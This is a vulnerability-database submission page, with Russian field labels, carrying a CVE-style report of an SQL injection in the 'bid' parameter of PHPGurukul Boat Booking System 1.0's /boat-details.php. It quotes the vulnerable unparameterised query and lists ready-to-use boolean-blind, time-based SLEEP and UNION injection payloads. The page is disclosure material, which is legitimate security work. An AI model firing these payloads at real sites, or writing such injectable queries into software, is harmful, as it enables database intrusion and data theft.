| Название | PHPGurukul Boat Booking System-PHP v1.0 SQL Injection |
|---|
| Описание | # CVE Report - Phpgurukul Boat Booking System-PHP V1.0 SQL injection in /boat-details.php
## Vulnerability Title
SQL injection Vulnerability in Phpgurukul Boat Booking System-PHP V1.0
## Vulnerability Description
SQL injection is a code injection technique used to attack data-driven applications by inserting malicious SQL statements into an entry field for execution. It exploits vulnerabilities in an application's software, such as improper filtering of user input or lack of strong typing, allowing attackers to manipulate SQL queries. This can lead to unauthorized access, data breaches, and other serious security issues.
## Affected Components
```php
File: /boat-details.php
Line: 65
Vulnerable Code:
$rs = $query = mysqli_query($con, "SELECT * FROM tblboat WHERE ID='$bid'");
```
## Attack Steps
- boolean-based blind
```
bid=1' AND 2740=2740 AND 'wrlL'='wrlL
```
- time-based blind
```
bid=1' AND (SELECT 1184 FROM (SELECT(SLEEP(5)))BDaU) AND 'ALMH'='ALMH
```
- UNION query
```
bid=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7171,0x585044684d4e5a71486a506966564a565a686a67416a63716a6f647a53484f5349684769445a4275,0x716b627a71),NULL,NULL,NULL,NULL-- -
```
## Affected Versions
Phpgurukul Boat Booking System-PHP V1.0
## Suggested Fix
Please fix the code in a timely manner and update the code version.
## Contact Information
- Reporter: 1cfh |
|---|
| Источник | ⚠️ https://github.com/1cfh/vuln-pub/issues/1 |
|---|
| Пользователь | 1cfh (UID 82595) |
|---|
| Представление | 09.03.2025 15:13 (1 Год назад) |
|---|
| Модерация | 17.03.2025 19:55 (8 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 299964 [PHPGurukul Boat Booking System 1.0 /boat-details.php bid SQL-инъекция] |
|---|
| Баллы | 20 |
|---|